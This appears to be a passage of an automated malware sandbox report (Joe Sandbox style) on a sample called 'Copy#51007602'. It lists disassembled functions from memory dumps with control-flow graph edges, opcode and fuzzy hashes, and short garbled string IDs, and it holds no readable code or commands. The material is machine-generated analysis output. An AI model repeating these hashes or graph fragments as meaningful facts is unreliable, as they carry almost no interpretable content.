                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fa1e4d54fd8fc37114501c83722cb0dbfb1373a3f632d0cf0d7747bca1bf923
                                                • Instruction ID: 04d4ca9a291ea90e102d1eb2fff754c7e6804fed17140704b969d275d93cec8a
                                                • Opcode Fuzzy Hash: 5fa1e4d54fd8fc37114501c83722cb0dbfb1373a3f632d0cf0d7747bca1bf923
                                                • Instruction Fuzzy Hash: 3F71DF70E1561CCFDB24DFAAD948BEEBBB6BF89300F10916AD419A7291DB345946CF00
                                                Function 00F16C6C Relevance: .2, Instructions: 162COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2110369451.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 922621374c9280ee26aac1fd69e62e30d045c6a116d743c33f35d0a837e51c19
                                                • Instruction ID: a7a490f81f8cdc3a1419bee3921d6a8f218dd7a8969c3dbf814ad73de628b047
                                                • Opcode Fuzzy Hash: 922621374c9280ee26aac1fd69e62e30d045c6a116d743c33f35d0a837e51c19
                                                • Instruction Fuzzy Hash: EE611376A04609CFD714CF58D884FE9B7B2FB88311F648166E4559B3A5C734EC82EB90
                                                Function 04F16328 Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2123016154.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4f10000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf83763a86deaeaf595a205d31fade71dfa5e725e573c6f2ee4eb9572039c0c9
                                                • Instruction ID: d6f06a7163689f371ddc80394b621ed095fe35e1b91ceee752e4209bf3234917
                                                • Opcode Fuzzy Hash: cf83763a86deaeaf595a205d31fade71dfa5e725e573c6f2ee4eb9572039c0c9
                                                • Instruction Fuzzy Hash: FA4159B1E016198BEB08CFABD94059EFBF3BFC8310F14C07AD558AB225DB3459468B54
                                                Function 04EF7AA8 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 800 4ef7aa8-4ef7ad0 802 4ef7b1e-4ef7b2c 800->802 803 4ef7ad2-4ef7b19 800->803 804 4ef7b2e-4ef7b39 call 4ef55c8 802->804 805 4ef7b3b 802->805 850 4ef7f75-4ef7f7c 803->850 807 4ef7b3d-4ef7b44 804->807 805->807 810 4ef7c2d-4ef7c31 807->810 811 4ef7b4a-4ef7b4e 807->811 815 4ef7c87-4ef7c91 810->815 816 4ef7c33-4ef7c42 call 4ef37c8 810->816 812 4ef7f7d-4ef7fa5 811->812 813 4ef7b54-4ef7b58 811->813 824 4ef7fac-4ef7fd6 812->824 817 4ef7b6a-4ef7bc8 call 4ef5308 call 4ef5d70 813->817 818 4ef7b5a-4ef7b64 813->818 819 4ef7cca-4ef7cf0 815->819 820 4ef7c93-4ef7ca2 call 4ef2e58 815->820 828 4ef7c46-4ef7c4b 816->828 860 4ef7bce-4ef7c28 817->860 861 4ef803b-4ef8065 817->861 818->817 818->824 844 4ef7cfd 819->844 845 4ef7cf2-4ef7cfb 819->845 837 4ef7fde-4ef7ff4 820->837 838 4ef7ca8-4ef7cc5 820->838 824->837 832 4ef7c4d-4ef7c82 call 4ef7570 828->832 833 4ef7c44 828->833 832->850 833->828 863 4ef7ffc-4ef8034 837->863 838->850 852 4ef7cff-4ef7d27 844->852 845->852 868 4ef7d2d-4ef7d46 852->868 869 4ef7df8-4ef7dfc 852->869 860->850 870 4ef806f-4ef8075 861->870 871 4ef8067-4ef806d 861->871 863->861 868->869 890 4ef7d4c-4ef7d5b call 4ef2880 868->890 872 4ef7dfe-4ef7e17 869->872 873 4ef7e76-4ef7e80 869->873 871->870 878 4ef8076-4ef80b3 871->878 872->873 896 4ef7e19-4ef7e28 call 4ef2880 872->896 875 4ef7edd-4ef7ee6 873->875 876 4ef7e82-4ef7e8c 873->876 880 4ef7f1e-4ef7f6b 875->880 881 4ef7ee8-4ef7f16 call 4ef4b00 call 4ef4b20 875->881 891 4ef7e8e-4ef7e90 876->891 892 4ef7e92-4ef7ea4 876->892 901 4ef7f73 880->901 881->880 909 4ef7d5d-4ef7d63 890->909 910 4ef7d73-4ef7d88 890->910 898 4ef7ea6-4ef7ea8 891->898 892->898 917 4ef7e2a-4ef7e30 896->917 918 4ef7e40-4ef7e4b 896->918 906 4ef7eaa-4ef7eae 898->906 907 4ef7ed6-4ef7edb 898->907 901->850 912 4ef7ecc-4ef7ed1 call 4ef1680 906->912 913 4ef7eb0-4ef7ec9 906->913 907->875 907->876 919 4ef7d67-4ef7d69 909->919 920 4ef7d65 909->920 923 4ef7dbc-4ef7dc5 910->923 924 4ef7d8a-4ef7db6 call 4ef3c50 910->924 912->907 913->912 927 4ef7e34-4ef7e36 917->927 928 4ef7e32 917->928 918->861 929 4ef7e51-4ef7e74 918->929 919->910 920->910 923->861 926 4ef7dcb-4ef7df2 923->926 924->863 924->923 926->869 926->890 927->918 928->918 929->873 929->896
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Haq$Haq$Haq
                                                • API String ID: 0-3013282719
                                                • Opcode ID: a857b174d6a1ad0454a7f76a933967f8bdb938ade823db6fa5ec6868dee02691
                                                • Instruction ID: d58f9da440b51390b77490d395dafbddfc58e25e0a82bef2cb946823a534e80f
                                                • Opcode Fuzzy Hash: a857b174d6a1ad0454a7f76a933967f8bdb938ade823db6fa5ec6868dee02691
                                                • Instruction Fuzzy Hash: 08127B31A002049FDB24DFA9D984AAEB7B2FF88304F54856DE50A9B395DB35FC46CB50
                                                Function 04EF9768 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 942 4ef9768-4ef9793 1062 4ef9795 call 4ef9c88 942->1062 1063 4ef9795 call 4ef9c71 942->1063 943 4ef979b-4ef97a5 944 4ef97c7-4ef97dd call 4ef9570 943->944 945 4ef97a7-4ef97aa 943->945 951 4ef9b53-4ef9b67 944->951 952 4ef97e3-4ef97ef 944->952 1055 4ef97ac call 4efa0d8 945->1055 1056 4ef97ac call 4efa080 945->1056 1057 4ef97ac call 4efa070 945->1057 947 4ef97b2-4ef97b4 947->944 949 4ef97b6-4ef97be 947->949 949->944 962 4ef9ba7-4ef9bb0 951->962 953 4ef97f5-4ef97f8 952->953 954 4ef9920-4ef9927 952->954 955 4ef97fb-4ef9804 953->955 957 4ef992d-4ef9936 954->957 958 4ef9a56-4ef9a90 call 4ef8f78 954->958 960 4ef980a-4ef981e 955->960 961 4ef9c48 955->961 957->958 963 4ef993c-4ef9a48 call 4ef8f78 call 4ef9508 call 4ef8f78 957->963 1060 4ef9a93 call 4efbf00 958->1060 1061 4ef9a93 call 4efbf10 958->1061 977 4ef9824-4ef98b9 call 4ef9570 * 2 call 4ef8f78 call 4ef9508 call 4ef95b0 call 4ef9658 call 4ef96c0 960->977 978 4ef9910-4ef991a 960->978 969 4ef9c4d-4ef9c51 961->969 965 4ef9b75-4ef9b7e 962->965 966 4ef9bb2-4ef9bb9 962->966 1053 4ef9a4a 963->1053 1054 4ef9a53 963->1054 965->961 971 4ef9b84-4ef9b96 965->971 967 4ef9bbb-4ef9bfe call 4ef8f78 966->967 968 4ef9c07-4ef9c0e 966->968 967->968 979 4ef9c33-4ef9c46 968->979 980 4ef9c10-4ef9c20 968->980 975 4ef9c5c 969->975 976 4ef9c53 969->976 988 4ef9b98-4ef9b9d 971->988 989 4ef9ba6 971->989 986 4ef9c5d 975->986 976->975 1033 4ef98bb-4ef98d3 call 4ef9658 call 4ef8f78 call 4ef9228 977->1033 1034 4ef98d8-4ef990b call 4ef96c0 977->1034 978->954 978->955 979->969 980->979 991 4ef9c22-4ef9c2a 980->991 986->986 1058 4ef9ba0 call 4efc6a0 988->1058 1059 4ef9ba0 call 4efc6b0 988->1059 989->962 991->979 1001 4ef9a99-4ef9b4a call 4ef8f78 1001->951 1033->1034 1034->978 1053->1054 1054->958 1055->947 1056->947 1057->947 1058->989 1059->989 1060->1001 1061->1001 1062->943 1063->943
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q$4']q
                                                • API String ID: 0-705557208
                                                • Opcode ID: caf090af4762fe927b025205bae3bf3f1578d22e76d0791dceb050ea728c152c
                                                • Instruction ID: 59140602d6faa97dc23f9d6d392222faa1817473af6699dc81f5eed52f24fb99
                                                • Opcode Fuzzy Hash: caf090af4762fe927b025205bae3bf3f1578d22e76d0791dceb050ea728c152c
                                                • Instruction Fuzzy Hash: EAF1B874B10218DFDB08EFA4D994A9DBBB2FF88304F518158E945AB3A5DB74EC42CB50
                                                Function 04EFDD2F Relevance: 4.1, Strings: 3, Instructions: 369COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1064 4efdd2f 1065 4efdd33-4efdd39 1064->1065 1065->1065 1066 4efdd3b-4efdd50 1065->1066 1067 4efde69-4efde8e 1066->1067 1068 4efdd56-4efdd5a 1066->1068 1069 4efde95-4efdeba 1067->1069 1068->1069 1070 4efdd60-4efdd69 1068->1070 1072 4efdec1-4efdef7 1069->1072 1071 4efdd6f-4efdd96 1070->1071 1070->1072 1082 4efde5e-4efde68 1071->1082 1083 4efdd9c-4efdd9e 1071->1083 1088 4efdefe 1072->1088 1085 4efddbf-4efddc1 1083->1085 1086 4efdda0-4efdda3 1083->1086 1090 4efddc4-4efddc8 1085->1090 1086->1088 1089 4efdda9-4efddb3 1086->1089 1096 4efdf03-4efdf06 1088->1096 1089->1088 1091 4efddb9-4efddbd 1089->1091 1093 4efddca-4efddd9 1090->1093 1094 4efde29-4efde35 1090->1094 1091->1085 1091->1090 1093->1088 1102 4efdddf-4efde26 call 4ef16b0 1093->1102 1094->1088 1095 4efde3b-4efde58 call 4ef16b0 1094->1095 1095->1082 1095->1083 1098 4efdf07-4efdf09 1096->1098 1098->1096 1101 4efdf0b-4efdf0d 1098->1101 1101->1098 1103 4efdf0f-4efdf11 1101->1103 1102->1094 1103->1101 1105 4efdf13-4efdf54 1103->1105 1111 4efdf78-4efdf8f 1105->1111 1112 4efdf56-4efdf6a call 4efe210 1105->1112 1121 4efdf95-4efe07b call 4ef9570 call 4ef8f78 * 2 call 4ef95b0 call 4efcd78 call 4ef8f78 call 4efbf10 call 4ef9e18 1111->1121 1122 4efe080-4efe090 1111->1122 1187 4efdf6d call 4efe458 1112->1187 1188 4efdf6d call 4efe5b8 1112->1188 1189 4efdf6d call 4efe2c0 1112->1189 1190 4efdf6d call 4efe2d0 1112->1190 1118 4efdf73 1120 4efe1a3-4efe1ae 1118->1120 1127 4efe1dd-4efe1fe call 4ef96c0 1120->1127 1128 4efe1b0-4efe1c0 1120->1128 1121->1122 1130 4efe17e-4efe19a call 4ef8f78 1122->1130 1131 4efe096-4efe170 call 4ef9570 * 2 call 4ef9d28 call 4ef8f78 * 2 call 4ef9228 call 4ef96c0 call 4ef8f78 1122->1131 1142 4efe1c2-4efe1c8 1128->1142 1143 4efe1d0-4efe1d8 call 4ef9e18 1128->1143 1130->1120 1183 4efe17b 1131->1183 1184 4efe172 1131->1184 1142->1143 1143->1127 1183->1130 1184->1183 1187->1118 1188->1118 1189->1118 1190->1118
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$(aq$Haq
                                                • API String ID: 0-2456560092
                                                • Opcode ID: 0696cf251fc06ad145cb34bb5864fbf5e32c3f54474bb92e60c0ee5a5740211b
                                                • Instruction ID: b1dc916cf5d09c29b51d2cdf666ffd005d7076a915bf6bd954934d986ac10456
                                                • Opcode Fuzzy Hash: 0696cf251fc06ad145cb34bb5864fbf5e32c3f54474bb92e60c0ee5a5740211b
                                                • Instruction Fuzzy Hash: 8CF16634A00209DFDB04EF64D99499EBBB2FF85304F118569E906AB365DB30FD42CB51
                                                Function 04EF3F98 Relevance: 3.0, Strings: 2, Instructions: 523COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1951 4ef3f98-4ef3fce 1952 4ef3fdf-4ef3fe8 1951->1952 1953 4ef3fd0-4ef3fdd 1951->1953 1953->1952 1954 4ef3feb-4ef3ff8 1953->1954 1955 4ef3ffa-4ef4001 1954->1955 1956 4ef4003 1954->1956 1957 4ef400a-4ef4034 1955->1957 1956->1957 1958 4ef403d-4ef4050 call 4ef3c88 1957->1958 1959 4ef4036 1957->1959 1962 4ef4056-4ef4069 1958->1962 1963 4ef4194-4ef419b 1958->1963 1959->1958 1973 4ef406b-4ef4072 1962->1973 1974 4ef4077-4ef4091 1962->1974 1964 4ef4435-4ef443c 1963->1964 1965 4ef41a1-4ef41b6 1963->1965 1966 4ef443e-4ef4447 1964->1966 1967 4ef44ab-4ef44b2 1964->1967 1978 4ef41b8-4ef41ba 1965->1978 1979 4ef41d6-4ef41dc 1965->1979 1966->1967 1971 4ef4449-4ef445c 1966->1971 1969 4ef454e-4ef4555 1967->1969 1970 4ef44b8-4ef44c1 1967->1970 1976 4ef4557-4ef4568 1969->1976 1977 4ef4571-4ef4577 1969->1977 1970->1969 1975 4ef44c7-4ef44da 1970->1975 1971->1967 1994 4ef445e-4ef44a3 call 4ef10b0 1971->1994 1980 4ef418d 1973->1980 1989 4ef4098-4ef40a5 1974->1989 1990 4ef4093-4ef4096 1974->1990 1999 4ef44ed-4ef44f1 1975->1999 2000 4ef44dc-4ef44eb 1975->2000 1976->1977 2001 4ef456a 1976->2001 1984 4ef4589-4ef4592 1977->1984 1985 4ef4579-4ef457f 1977->1985 1978->1979 1983 4ef41bc-4ef41d3 1978->1983 1986 4ef42a4-4ef42a8 1979->1986 1987 4ef41e2-4ef41e4 1979->1987 1980->1963 1983->1979 1995 4ef4595-4ef460a 1985->1995 1996 4ef4581-4ef4587 1985->1996 1986->1964 1991 4ef42ae-4ef42b0 1986->1991 1987->1986 1988 4ef41ea-4ef422b call 4ef10b0 * 2 1987->1988 2036 4ef4230-4ef426b call 4ef10b0 * 2 1988->2036 1997 4ef40a7-4ef40bb 1989->1997 1990->1997 1991->1964 1998 4ef42b6-4ef42bf 1991->1998 1994->1967 2032 4ef44a5-4ef44a8 1994->2032 2070 4ef460c-4ef4616 1995->2070 2071 4ef4618 1995->2071 1996->1984 1996->1995 1997->1980 2031 4ef40c1-4ef4115 1997->2031 2006 4ef4412-4ef4418 1998->2006 2007 4ef44f3-4ef44f5 1999->2007 2008 4ef4511-4ef4513 1999->2008 2000->1999 2001->1977 2011 4ef442b 2006->2011 2012 4ef441a-4ef4429 2006->2012 2007->2008 2015 4ef44f7-4ef450e 2007->2015 2008->1969 2010 4ef4515-4ef451b 2008->2010 2010->1969 2017 4ef451d-4ef454b 2010->2017 2020 4ef442d-4ef442f 2011->2020 2012->2020 2015->2008 2017->1969 2020->1964 2024 4ef42c4-4ef42d2 call 4ef2880 2020->2024 2038 4ef42ea-4ef4304 2024->2038 2039 4ef42d4-4ef42da 2024->2039 2073 4ef4117-4ef4119 2031->2073 2074 4ef4123-4ef4127 2031->2074 2032->1967 2063 4ef426d-4ef427f call 4ef10b0 2036->2063 2064 4ef4282-4ef42a1 call 4ef10b0 2036->2064 2038->2006 2048 4ef430a-4ef430e 2038->2048 2042 4ef42de-4ef42e0 2039->2042 2043 4ef42dc 2039->2043 2042->2038 2043->2038 2050 4ef432f 2048->2050 2051 4ef4310-4ef4319 2048->2051 2056 4ef4332-4ef434c 2050->2056 2054 4ef431b-4ef431e 2051->2054 2055 4ef4320-4ef4323 2051->2055 2059 4ef432d 2054->2059 2055->2059 2056->2006 2078 4ef4352-4ef43d3 call 4ef10b0 * 4 2056->2078 2059->2056 2063->2064 2064->1986 2076 4ef461d-4ef461f 2070->2076 2071->2076 2073->2074 2074->1980 2077 4ef4129-4ef4141 2074->2077 2079 4ef4626-4ef462b 2076->2079 2080 4ef4621-4ef4624 2076->2080 2077->1980 2084 4ef4143-4ef414f 2077->2084 2104 4ef43ea-4ef4410 call 4ef10b0 2078->2104 2105 4ef43d5-4ef43e7 call 4ef10b0 2078->2105 2082 4ef4631-4ef465e 2079->2082 2080->2082 2087 4ef415e-4ef4164 2084->2087 2088 4ef4151-4ef4154 2084->2088 2089 4ef416c-4ef4175 2087->2089 2090 4ef4166-4ef4169 2087->2090 2088->2087 2092 4ef4177-4ef417a 2089->2092 2093 4ef4184-4ef418a 2089->2093 2090->2089 2092->2093 2093->1980 2104->1964 2104->2006 2105->2104
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $]q$$]q
                                                • API String ID: 0-127220927
                                                • Opcode ID: 8230a3aa7ea36a8323c6dfb48c6b4b761e9b0b002acad979227124472d2fa105
                                                • Instruction ID: 68df7b93425ba39ab9bdcac7a5c40aa8deabc7b858aa97b642f040da5b636460
                                                • Opcode Fuzzy Hash: 8230a3aa7ea36a8323c6dfb48c6b4b761e9b0b002acad979227124472d2fa105
                                                • Instruction Fuzzy Hash: 19229D30E00229DFDB05DFA9D850AEEBBB2FF58704F108515E951AB394DB39AD46CB90
                                                Function 04ED18C0 Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2110 4ed18c0-4ed18e5 2111 4ed18ec-4ed1910 2110->2111 2112 4ed18e7 2110->2112 2113 4ed1931 2111->2113 2114 4ed1912-4ed191b 2111->2114 2112->2111 2117 4ed1934-4ed1938 2113->2117 2115 4ed191d-4ed1920 2114->2115 2116 4ed1922-4ed1925 2114->2116 2118 4ed192f 2115->2118 2116->2118 2119 4ed1c91-4ed1ca8 2117->2119 2118->2117 2121 4ed193d-4ed1941 2119->2121 2122 4ed1cae-4ed1cb2 2119->2122 2125 4ed1946-4ed194a 2121->2125 2126 4ed1943-4ed19a0 2121->2126 2123 4ed1cdb-4ed1cdf 2122->2123 2124 4ed1cb4-4ed1cd8 2122->2124 2130 4ed1ce1-4ed1cea 2123->2130 2131 4ed1d00 2123->2131 2124->2123 2128 4ed194c-4ed1970 2125->2128 2129 4ed1973-4ed1997 2125->2129 2136 4ed19a5-4ed19a9 2126->2136 2137 4ed19a2-4ed1a13 2126->2137 2128->2129 2129->2119 2132 4ed1cec-4ed1cef 2130->2132 2133 4ed1cf1-4ed1cf4 2130->2133 2134 4ed1d03-4ed1d09 2131->2134 2141 4ed1cfe 2132->2141 2133->2141 2138 4ed19ab-4ed19cf 2136->2138 2139 4ed19d2-4ed19e3 2136->2139 2144 4ed1a18-4ed1a1c 2137->2144 2145 4ed1a15-4ed1a72 2137->2145 2138->2139 2225 4ed19e6 call 5472908 2139->2225 2226 4ed19e6 call 5472918 2139->2226 2141->2134 2148 4ed1a1e-4ed1a42 2144->2148 2149 4ed1a45-4ed1a69 2144->2149 2155 4ed1a74-4ed1ad0 2145->2155 2156 4ed1a77-4ed1a7b 2145->2156 2148->2149 2149->2119 2167 4ed1ad5-4ed1ad9 2155->2167 2168 4ed1ad2-4ed1b34 2155->2168 2158 4ed1a7d-4ed1aa1 2156->2158 2159 4ed1aa4-4ed1ac7 2156->2159 2158->2159 2159->2119 2164 4ed19ec-4ed19f9 2165 4ed1a09-4ed1a0a 2164->2165 2166 4ed19fb-4ed1a01 2164->2166 2165->2119 2166->2165 2169 4ed1adb-4ed1aff 2167->2169 2170 4ed1b02-4ed1b1a 2167->2170 2177 4ed1b39-4ed1b3d 2168->2177 2178 4ed1b36-4ed1b98 2168->2178 2169->2170 2187 4ed1b1c-4ed1b22 2170->2187 2188 4ed1b2a-4ed1b2b 2170->2188 2179 4ed1b3f-4ed1b63 2177->2179 2180 4ed1b66-4ed1b7e 2177->2180 2189 4ed1b9d-4ed1ba1 2178->2189 2190 4ed1b9a-4ed1bfc 2178->2190 2179->2180 2198 4ed1b8e-4ed1b8f 2180->2198 2199 4ed1b80-4ed1b86 2180->2199 2187->2188 2188->2119 2191 4ed1bca-4ed1be2 2189->2191 2192 4ed1ba3-4ed1bc7 2189->2192 2200 4ed1bfe-4ed1c5d 2190->2200 2201 4ed1c01-4ed1c05 2190->2201 2209 4ed1be4-4ed1bea 2191->2209 2210 4ed1bf2-4ed1bf3 2191->2210 2192->2191 2198->2119 2199->2198 2211 4ed1c5f-4ed1c83 2200->2211 2212 4ed1c86-4ed1c89 2200->2212 2202 4ed1c2e-4ed1c46 2201->2202 2203 4ed1c07-4ed1c2b 2201->2203 2218 4ed1c48-4ed1c4e 2202->2218 2219 4ed1c56-4ed1c57 2202->2219 2203->2202 2209->2210 2210->2119 2211->2212 2212->2119 2218->2219 2219->2119 2225->2164 2226->2164
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122803299.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ed0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4']q$4']q
                                                • API String ID: 0-3120983240
                                                • Opcode ID: b2e1f7bb1d0a56ed3dbe4bef076295243d8447e906444320b7d2210bb2e35a17
                                                • Instruction ID: 0f66579500f581ee23eb28b7a469a0e8afb4d9af4bcfc2d19424aa522cd76583
                                                • Opcode Fuzzy Hash: b2e1f7bb1d0a56ed3dbe4bef076295243d8447e906444320b7d2210bb2e35a17
                                                • Instruction Fuzzy Hash: 40E1F334E04218DFDB18DFA9E488AEDBBB2FF49316F10A569E406A7254DB356946CF00
                                                Function 04EF5308 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Pl]q$$]q
                                                • API String ID: 0-2369359564
                                                • Opcode ID: 1a2d29fba8def25143db50efa4750633adf7d354ffef9ce16c50d5e4ba5ce320
                                                • Instruction ID: e2d66ce95639c549b137a2dd7468dfebb0315710fa9eae0e57491647952f9877
                                                • Opcode Fuzzy Hash: 1a2d29fba8def25143db50efa4750633adf7d354ffef9ce16c50d5e4ba5ce320
                                                • Instruction Fuzzy Hash: 17B11430B401149FCB04DF29C884AAE7BF6AF89715B1144A9E605CB3B6DB71EC42CBA1
                                                Function 04EF5B89 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2460 4ef5b89-4ef5bc0 2462 4ef5cac-4ef5cd1 2460->2462 2463 4ef5bc6-4ef5bca 2460->2463 2470 4ef5cd8-4ef5cfc 2462->2470 2464 4ef5bde-4ef5be2 2463->2464 2465 4ef5bcc-4ef5bd8 2463->2465 2467 4ef5be8-4ef5bff 2464->2467 2468 4ef5d03-4ef5d28 2464->2468 2465->2464 2465->2470 2478 4ef5c13-4ef5c17 2467->2478 2479 4ef5c01-4ef5c0d 2467->2479 2486 4ef5d2f-4ef5d82 2468->2486 2470->2468 2481 4ef5c19-4ef5c32 2478->2481 2482 4ef5c43-4ef5c5c call 4ef27b8 2478->2482 2479->2478 2479->2486 2481->2482 2495 4ef5c34-4ef5c37 2481->2495 2493 4ef5c5e-4ef5c82 2482->2493 2494 4ef5c85-4ef5ca9 2482->2494 2503 4ef5dba-4ef5ddf 2486->2503 2504 4ef5d84-4ef5da4 2486->2504 2497 4ef5c40 2495->2497 2497->2482 2511 4ef5de6-4ef5e3a 2503->2511 2504->2511 2512 4ef5da6-4ef5db7 2504->2512 2518 4ef5ee1-4ef5f2f 2511->2518 2519 4ef5e40-4ef5e4c 2511->2519 2532 4ef5f5f-4ef5f65 2518->2532 2533 4ef5f31-4ef5f55 2518->2533 2522 4ef5e4e-4ef5e55 2519->2522 2523 4ef5e56-4ef5e6a call 4ef0fc0 2519->2523 2527 4ef5e6c-4ef5e91 2523->2527 2528 4ef5ed9-4ef5ee0 2523->2528 2539 4ef5ed4-4ef5ed7 2527->2539 2540 4ef5e93-4ef5ead 2527->2540 2534 4ef5f77-4ef5f86 2532->2534 2535 4ef5f67-4ef5f74 2532->2535 2533->2532 2537 4ef5f57 2533->2537 2537->2532 2539->2527 2539->2528 2540->2539 2542 4ef5eaf-4ef5eb8 2540->2542 2543 4ef5eba-4ef5ebd 2542->2543 2544 4ef5ec7-4ef5ed3 2542->2544 2543->2544
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2122893814.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4ef0000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$(aq
                                                • API String ID: 0-3916115647
                                                • Opcode ID: c987a50b0fef184927bd162f4e5d4a7eaa1568f577d947d1236a9bb0d6369203
                                                • Instruction ID: da0ec150d211d2db0b55c1415e22b79abcd7eeed98c793b59060c177885a3266
                                                • Opcode Fuzzy Hash: c987a50b0fef184927bd162f4e5d4a7eaa1568f577d947d1236a9bb0d6369203
                                                • Instruction Fuzzy Hash: D2519D313002099FDB15AF28E894AAE3BA6FF94314F118169E905CB296DF35ED46CB90
                                                Function 05470040 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2545 5470040-547004b 2546 547004d-5470057 2545->2546 2547 5470059 2545->2547 2548 547005e-5470060 2546->2548 2547->2548 2549 5470062-5470075 2548->2549 2550 547008e-5470103 2548->2550 2580 5470077 call 5470006 2549->2580 2581 5470077 call 5470040 2549->2581 2582 5470077 call 54700c0 2549->2582 2583 5470077 call 54700d0 2549->2583 2561 5470108-5470110 2550->2561 2556 547007d-547008b 2562 5470164-54701a4 2561->2562 2563 5470112-547012c 2561->2563 2575 54701ab-54701c6 2562->2575 2568 547015e-5470162 2563->2568 2569 547012e-547013c 2563->2569 2568->2562 2568->2563 2569->2568 2573 547013e-5470142 2569->2573 2574 5470144-5470152 2573->2574 2573->2575 2574->2568 2579 5470154-547015d 2574->2579 2580->2556 2581->2556 2582->2556 2583->2556
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2125713429.0000000005470000.00000040.00000800.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5470000_Copy#51007602.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (aq$Haq
                                                • API String ID: 0-3785302501
                                                • Opcode ID: 3bdb5fbb246207947ef01b79b5e28ca5c0cbf5e36e1ad40affd6b17830582963
                                                • Instruction ID: af9af1ad7f7fae1b7ec920ccf7d298c5f1760b4560c90fb4f74a1b340fb37adb
                                                • Opcode Fuzzy Hash: 3bdb5fbb246207947ef01b79b5e28ca5c0cbf5e36e1ad40affd6b17830582963
                                                • Instruction Fuzzy Hash: 3441E1317052548FD715AB28C954AAE7BF2FF86214B1580EAE109DB3A2DE35EC07CB91
                                                Function 0571557A Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
